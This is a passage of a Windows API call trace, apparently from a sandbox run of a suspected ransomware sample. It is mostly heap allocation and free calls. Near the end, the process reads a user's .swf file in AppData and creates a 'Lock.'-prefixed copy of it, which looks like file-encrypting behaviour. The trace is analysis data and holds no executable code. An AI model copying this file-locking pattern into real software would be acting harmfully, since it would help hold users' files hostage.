lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0238.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0238.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f7b0 | out: hHeap=0x970000) returned 1 [0238.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0238.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0238.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0238.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0238.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0238.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0238.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0238.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0238.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0238.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0238.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0238.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0238.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0238.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0238.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0238.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0238.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0238.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0238.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0238.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0238.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0238.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0238.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0238.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0238.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0238.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0238.860] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0238.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0238.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0238.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0238.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0238.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0238.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0238.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0238.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0238.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0238.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0238.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0238.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0238.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0238.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0238.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0238.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0238.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0238.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0238.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0238.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 [0238.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0238.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0238.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0238.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0238.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0238.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0238.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5d0 | out: hHeap=0x970000) returned 1 [0238.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0238.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0238.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0238.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0238.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0238.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0238.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0238.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0238.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0238.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0238.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0238.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0238.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f710 | out: hHeap=0x970000) returned 1 [0238.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0238.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0238.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0238.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f580 | out: hHeap=0x970000) returned 1 [0238.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0238.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5f8 | out: hHeap=0x970000) returned 1 [0238.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0238.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f760 | out: hHeap=0x970000) returned 1 [0238.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0238.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0238.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0238.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f648 | out: hHeap=0x970000) returned 1 [0238.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0238.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0238.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f558 | out: hHeap=0x970000) returned 1 [0238.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0238.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f490 | out: hHeap=0x970000) returned 1 [0238.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0238.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5a8 | out: hHeap=0x970000) returned 1 [0238.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0238.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f7d8 | out: hHeap=0x970000) returned 1 [0238.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0238.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0238.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0238.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3a0 | out: hHeap=0x970000) returned 1 [0238.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0238.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0238.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0238.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0238.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0238.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0238.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0238.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0238.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0238.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50668 | out: hHeap=0x970000) returned 1 [0238.863] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0238.863] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0238.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0238.863] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0238.863] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0238.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0238.864] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0238.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0238.864] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0238.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0238.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50668 [0238.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50488 [0238.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0238.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0238.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0238.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0238.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0238.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0238.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0238.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x3be0dd0 [0238.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0238.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0238.865] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/TXuB6gyi89__NoT9.swf" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\txub6gyi89__not9.swf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0238.865] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0238.865] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0238.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69c08 [0238.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0238.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50488 | out: hHeap=0x970000) returned 1 [0238.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0238.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50668 | out: hHeap=0x970000) returned 1 [0238.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0238.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0238.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0238.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0238.865] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0238.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0238.866] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0238.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0238.866] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0238.866] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0238.866] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0238.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0238.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0238.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0238.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0238.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0238.866] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0238.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0238.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0238.866] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0238.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0238.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0238.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e56588 [0238.866] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0238.866] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming")) returned 0x10 [0238.866] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0238.866] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0238.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0238.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f04810 [0238.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0238.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0238.868] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/Lock.TXuB6gyi89__NoT9.swf" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\lock.txub6gyi89__not9.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0238.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b48 [0238.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0238.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0238.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0238.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0238.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0238.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504e8 | out: hHeap=0x970000) returned 1 [0238.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0238.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0238.869] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0238.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0238.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0238.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b08 [0238.869] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0238.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0238.869] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0238.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0238.869] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0238.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0238.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0238.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0238.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0238.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0238.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0238.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0238.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0238.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0238.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0238.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0238.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0238.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0238.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0238.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0238.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0xe54020 [0238.913] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0238.913] ReadFile (in: hFile=0x2d0, lpBuffer=0x3be0dd0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0dd0*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0238.917] ReadFile (in: hFile=0x2d0, lpBuffer=0x3be0dd0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0dd0*, lpNumberOfBytesRead=0x8cf4f8*=0x5f46, lpOverlapped=0x0) returned 1 [0238.918] ReadFile (in: hFile=0x2d0, lpBuffer=0x3be0dd0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0dd0*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0238.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0238.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0238.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0238.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0238.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15f46) returned 0x2f14818 [0238.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe54020 | out: hHeap=0x970000) returned 1 [0238.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0238.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0238.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0238.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0238.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0238.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0238.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0238.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0238.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15f46) returned 0x2f2a768 [0238.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14818 | out: hHeap=0x970000) returned 1 [0238.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0238.926] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 